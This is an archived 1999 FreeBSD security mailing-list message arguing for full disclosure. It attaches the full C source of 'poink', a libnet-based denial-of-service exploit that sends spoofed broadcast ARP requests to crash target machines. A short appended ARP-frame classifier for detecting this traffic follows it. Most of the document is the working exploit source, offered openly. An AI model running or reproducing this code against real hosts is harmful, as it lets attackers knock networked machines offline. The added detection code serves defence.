Date:      Mon, 19 Apr 1999 19:54:07 +0200
From:      Harold Gutch <logix@foobar.franken.de>
To:        Chris <freebsd@hiway1.exit109.com>, The Tech-Admin Dude <geniusj@phoenix.unacom.com>
Cc:        security@FreeBSD.ORG
Subject:   Re: poink and freebsd
Message-ID:  <19990419195407.A6439@foobar.franken.de>
In-Reply-To: <Pine.BSF.3.96.990419130911.20749A-100000@hiway1.exit109.com>; from Chris on Mon, Apr 19, 1999 at 01:10:08PM -0400
References:  <Pine.BSF.4.10.9904191304590.68697-100000@phoenix.unacom.com> <Pine.BSF.3.96.990419130911.20749A-100000@hiway1.exit109.com>


--xXmbgvnjoT4axfJE
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename=muttIQ6439

On Mon, Apr 19, 1999 at 01:10:08PM -0400, Chris wrote:
> jd-
> 
> id rather not post the source to the list, since this is how exploits get
> distributed, and bad things occur.  i sent email to the security-officer,
> and a few people to test it out with their setup.. id rather not
> distribute it any further... i hope you understand my reasoning behind it
> :/
> 
> > On Mon, 19 Apr 1999, Robert Watson wrote:
> > 
> > > On Mon, 19 Apr 1999, Chris wrote:
> > > 
> > > > im sure ya'll have heard of poink, an exploit against freebsd/openbsd
> > > > machines (these are the boxes i have tested on) it appears to work very
> > > > efficiently in killing freebsd 3.1 - freebsd 3.0 machines, against one of
> > > > our freebsd 2.2.5 machines, it did bring up the error messages in
> > > > /var/log/messages (arp lookups) but didnt kill the machine like the
> > > > others...
> > > > 
> > > > im just wondering if there are any patches for this, and i noticed there
> > > > is no mention of it on freebsd's website....
> > > 
> > > Interestingly, I haven't heard about this one, and it doesn't appear to be
> > > on rootshell, etc.

Chris,

the fact that _you_ as somebody outside of the circles close to
the original author (which I simply assume) already have it,
shows that it already is public. Posting it to this list will
distribute it to more people, some of which might use it
maliciously, others though might fix it faster than it would be
fixed otherwise.
Keeping it secret doesn't help anything, this is similar to
proprietary programs/protocols, which in many cases are inferior
to open source or open protocols. You should get some information
about "full disclosure" and read it.

Anyway, I was able to find the source for poink after searching
for 5 minutes. As I don't have libnet installed (and I don't plan
to install it just to compile poink), I am not able to say
anything about what it does - perhaps somebody else can do so.

bye,
  Harold

-- 
<Shabby> Sleep is an abstinence syndrome which occurs due to lack of caffeine.
Wed Mar  4 04:53:33 CET 1998   #unix, ircnet

--xXmbgvnjoT4axfJE
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="poink.c"

/*
 *  $Id$
 *
 *  poink.c - NT/9x DOS attack
 *
 *  Code:
 *  Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
 *                         route|daemon9 <route@infonexus.com>
 *  All rights reserved.
 *
 *  Original Idea:
 *  Joel Jacobson (joel@mobila.cx)
 *
 *  This simple exploit was written as per the specification from Joel
 *  Jacobson's bugtraq post (http://geek-girl.com/bugtraq/1999_1/1299.html).
 *
 *  Needs libnet 0.99.
 *  Currently:  http://lazy.accessus.net/~route/libnet
 *  Soon:       http://www.packetfactory.net/
 *
 *  gcc poink.c -o poink -lnet
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 *
 */

#include <libnet.h>

u_char enet_src[6] = {0x00, 0x0d, 0x0e, 0x0a, 0x0d, 0x00};
u_char enet_dst[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};

int send_arp(struct link_int *, u_long, u_char *);
void usage(u_char *);

int
main(int argc, char *argv[])
{
    int c, amount;
    char errbuf[256];
    char *device = NULL;
    struct link_int *l;
    u_long ip;

    amount = 20;
    while ((c = getopt(argc, argv, "n:i:")) != EOF)
    {
        switch (c)
        {
            case 'i':
                device = optarg;
                break;
            case 'n':
                amount = atoi(optarg);
                break;
            default:
                exit(EXIT_FAILURE);
        }
    }

    if (!device)
    {
        usage(argv[0]);
        exit(EXIT_FAILURE);
    }

    if (argc <= optind)
    {
        usage(argv[0]);
        exit(EXIT_FAILURE);
    }
    else if ((ip = libnet_name_resolve(argv[optind], 1)) == -1)
    {
        fprintf(stderr, "Cannot resolve IP address\n");
        exit(EXIT_FAILURE);
    }

    l = libnet_open_link_interface(device, errbuf);
    if (!l)
    {
        fprintf(stderr, "libnet_open_link_interface: %s\n", errbuf);
        exit(EXIT_FAILURE);
    }

    while (amount--)
    {
        c = send_arp(l, ip, device);
        if (c == -1)
        {
            /* bail on the first error */
            break;
        }
    }
    printf("\n");
    return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}


int
send_arp(struct link_int *l, u_long ip, u_char *device)
{
    int n;
    u_char *buf;

    if (libnet_init_packet(ARP_H + ETH_H, &buf) == -1)
    {
        perror("libnet_init_packet memory:");
        exit(EXIT_FAILURE);
    }

    /*
     *  Ethernet header
     */
    libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_ARP, NULL, 0, buf);

    /*
     *  ARP header
     */
    libnet_build_arp(ARPHRD_ETHER,
        ETHERTYPE_IP,
        6,
        4,
        ARPOP_REQUEST,
        enet_src,
        (u_char *)&ip,
        enet_dst,
        (u_char *)&ip,
        NULL,
        0,
        buf + ETH_H);

    n = libnet_write_link_layer(l, device, buf, ARP_H + ETH_H);

    fprintf(stderr, ".");

    libnet_destroy_packet(&buf);
    return (n);
}


void
usage(u_char *name)
{
    fprintf(stderr, "%s -i interface [-n amount] ip\n", name);
}

--xXmbgvnjoT4axfJE--
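
For anyone monitoring a segment for this traffic: the attached program sends a broadcast ARP request whose sender and target IP are both the chosen address, from the fixed MAC 00:0d:0e:0a:0d:00. The classifier below is an added example, not part of the original message or of libnet; the inventory table, the verdict names and the sample frame (documentation address 192.0.2.10) are constructed for illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define ETH_HLEN 14
#define ARP_LEN  28   /* ARP body for Ethernet/IPv4 */

enum arp_verdict { ARP_IGNORE, ARP_OK, ARP_GRATUITOUS_KNOWN, ARP_CONFLICT };

/* Hypothetical inventory entry: the MAC expected to own an IPv4 address. */
struct binding { uint8_t ip[4]; uint8_t mac[6]; };

/* Constructed inventory and constructed frame in the shape described above. */
static const struct binding inventory[] = { { {192,0,2,10}, {0x02,0,0,0,0,0x01} } };
static const uint8_t sample_frame[ETH_HLEN + ARP_LEN] = {
    0xff,0xff,0xff,0xff,0xff,0xff, 0x00,0x0d,0x0e,0x0a,0x0d,0x00, 0x08,0x06,
    0x00,0x01, 0x08,0x00, 6, 4, 0x00,0x01,          /* Ethernet/IPv4, request */
    0x00,0x0d,0x0e,0x0a,0x0d,0x00, 192,0,2,10,      /* sender MAC, sender IP  */
    0xff,0xff,0xff,0xff,0xff,0xff, 192,0,2,10,      /* target MAC, target IP  */
};

static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Classify one raw Ethernet frame against the inventory of known bindings. */
enum arp_verdict
classify_arp(const uint8_t *f, size_t len, const struct binding *b, size_t nb)
{
    const uint8_t *a;
    size_t i;

    if (f == NULL || len < ETH_HLEN + ARP_LEN) return ARP_IGNORE; /* truncated */
    if (be16(f + 12) != 0x0806) return ARP_IGNORE;                /* not ARP */
    a = f + ETH_HLEN;
    if (be16(a) != 1 || be16(a + 2) != 0x0800 || a[4] != 6 || a[5] != 4)
        return ARP_IGNORE;                        /* not Ethernet/IPv4 ARP */
    if (be16(a + 6) != 1) return ARP_OK;          /* only requests are examined */
    if (memcmp(a + 14, a + 24, 4) != 0) return ARP_OK;   /* ordinary who-has */
    for (i = 0; i < nb; i++)                      /* sender IP == target IP */
        if (memcmp(b[i].ip, a + 14, 4) == 0)
            return memcmp(b[i].mac, a + 8, 6) ? ARP_CONFLICT : ARP_GRATUITOUS_KNOWN;
    return ARP_OK;                                /* address not in inventory */
}

int main(void)
{
    printf("verdict=%d\n", (int)classify_arp(sample_frame, sizeof sample_frame, inventory, 1));
    return 0;
}
```

A gratuitous ARP from the address's real owner (for example at boot or failover) yields `ARP_GRATUITOUS_KNOWN`, so only a claim from an unexpected MAC is reported as `ARP_CONFLICT`.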

